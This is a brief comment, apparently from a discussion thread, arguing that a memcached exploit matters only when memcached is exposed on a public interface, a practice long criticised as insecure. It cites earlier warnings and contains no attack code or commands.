memcached must be on a public interface or a hacker must gain access to a private network in order for this exploit to work. This was covered in 2003 as a bad idea. lists.danga.com/pipermail/memcached… Again in 2010, this was shown to be a really dumb thing to do. And not because of this exploit. www.sensepost.com/blog/4873.html If someone can get to your memcached on a public port, they are much more likely to just read all they can off of it rather than crash it.
